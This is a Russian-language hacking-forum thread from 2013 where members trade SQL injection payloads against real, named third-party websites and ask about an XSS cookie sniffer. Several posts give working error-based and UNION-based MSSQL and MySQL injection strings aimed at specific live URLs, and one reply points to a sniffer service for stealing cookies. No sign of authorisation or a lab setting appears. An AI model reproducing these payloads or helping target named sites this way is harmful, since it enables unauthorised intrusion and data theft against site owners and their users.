HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22761  
Старый 29.09.2013, 15:47
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sanic1977  
Помогите раскрутить такую скулю на mssql
id=15&type='+convert(int,@@version)+'
выводит:
[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.
Как дальше крутитЬ?
https://rdot.org/forum/showthread.php?t=826
 
Ответить с цитированием

  #22762  
Старый 30.09.2013, 00:22
Always
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами: 7504886

Репутация: 0
По умолчанию

Что может означать такая ошибка?

выпадает в поле логин - %5C

Warning: PDOStatement::execute(): SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5ebe553e01799a927b1d045924bbd4fd' AND status='ok'' at line 1 in /var/www/site/data/www/site.ru/application/class/Member.php on line 390
 
Ответить с цитированием

  #22763  
Старый 30.09.2013, 00:29
Sanic1977
Новичок
Регистрация: 29.10.2008
Сообщений: 1
С нами: 9228480

Репутация: 0
По умолчанию

'%2bconvert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFO RMATION_SCHEMA.TABLES))%2b'

выдает ошибку

Subqueries are not allowed in this context. Only scalar expressions are allowed.

и как его обойти?
 
Ответить с цитированием

  #22764  
Старый 30.09.2013, 10:05
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sanic1977  
'%2bconvert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFO RMATION_SCHEMA.TABLES))%2b'
выдает ошибку
Subqueries are not allowed in this context. Only scalar expressions are allowed.
и как его обойти?
Нельзя использовать в качестве параметра запрос.

Может сделать прощще:

1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA .TABLES)
 
Ответить с цитированием

  #22765  
Старый 30.09.2013, 14:25
Massay
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами: 6940406

Репутация: 0
По умолчанию

Добрый день, скажите пожалуйста каким сниффером вы пользуетесь для XSS
 
Ответить с цитированием

  #22766  
Старый 01.10.2013, 19:47
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию

В общем возникли некие трудности в получении данных, фильтра вроде бы нет, но не могу получить.

Код:
www.ukok-tour.ru/index.php?t=1+union+select+1,2,3+--+
http://www.isotropix.com/index.php?to=products&productid=99%27+union+select+1,2,3,4,5,6,7,8+--+&view=trynow
http://www.hmn.ru/index.php?index=14&value=12+order+by+1+--+
 
Ответить с цитированием

  #22767  
Старый 01.10.2013, 23:11
Always
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами: 7504886

Репутация: 0
По умолчанию

Цитата:
Сообщение от Unknowhacker  
В общем возникли некие трудности в получении данных, фильтра вроде бы нет, но не могу получить.
Код:
www.ukok-tour.ru/index.php?t=1+union+select+1,2,3+--+
http://www.isotropix.com/index.php?to=products&productid=99%27+union+select+1,2,3,4,5,6,7,8+--+&view=trynow
http://www.hmn.ru/index.php?index=14&value=12+order+by+1+--+
http://www.ukok-tour.ru/index.php?t=1'and(select+1+from(select+count(*),co ncat((select+table_name+from+information_schema.ta bles+limit+1,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)='and+--+
 
Ответить с цитированием

  #22768  
Старый 02.10.2013, 01:10
Ravenous
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
С нами: 7278806

Репутация: 26
По умолчанию

Цитата:
Сообщение от Unknowhacker  
В общем возникли некие трудности в получении данных, фильтра вроде бы нет, но не могу получить.
Код:
www.ukok-tour.ru/index.php?t=1+union+select+1,2,3+--+
http://www.isotropix.com/index.php?to=products&productid=99%27+union+select+1,2,3,4,5,6,7,8+--+&view=trynow
http://www.hmn.ru/index.php?index=14&value=12+order+by+1+--+
Код:
http://www.isotropix.com/index.php?to=products&productid=991 AND extractvalue(1,concat(0x3a,(select version() limit 0,1)))
в третьем случае нет инъекции
 
Ответить с цитированием

  #22769  
Старый 02.10.2013, 11:02
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами: 6747446

Репутация: 32
По умолчанию

Цитата:
Сообщение от Massay  
Добрый день, скажите пожалуйста каким сниффером вы пользуетесь для XSS
http://hpc.name/sniffer/
 
Ответить с цитированием

  #22770  
Старый 02.10.2013, 17:18
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами: 6747446

Репутация: 32
По умолчанию

Нашёл на этом сайте _http://agixo.ru/ уязвимость в куках прохожу по ссылке http://agixo.ru/1-reg.html реферер админ смотрим куки referer 1

запускаем оперу меняем 1 на к перехожу по ссылке уже такой http://agixo.ru/reg.html

смотрим Ник, ID, Предустановленый реф-бек: % все исчезла.

Что можно сделать с этой уязвимостью можно ли провести sql инвекцию я с уязвимостями в куках ещё не сталкивался
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.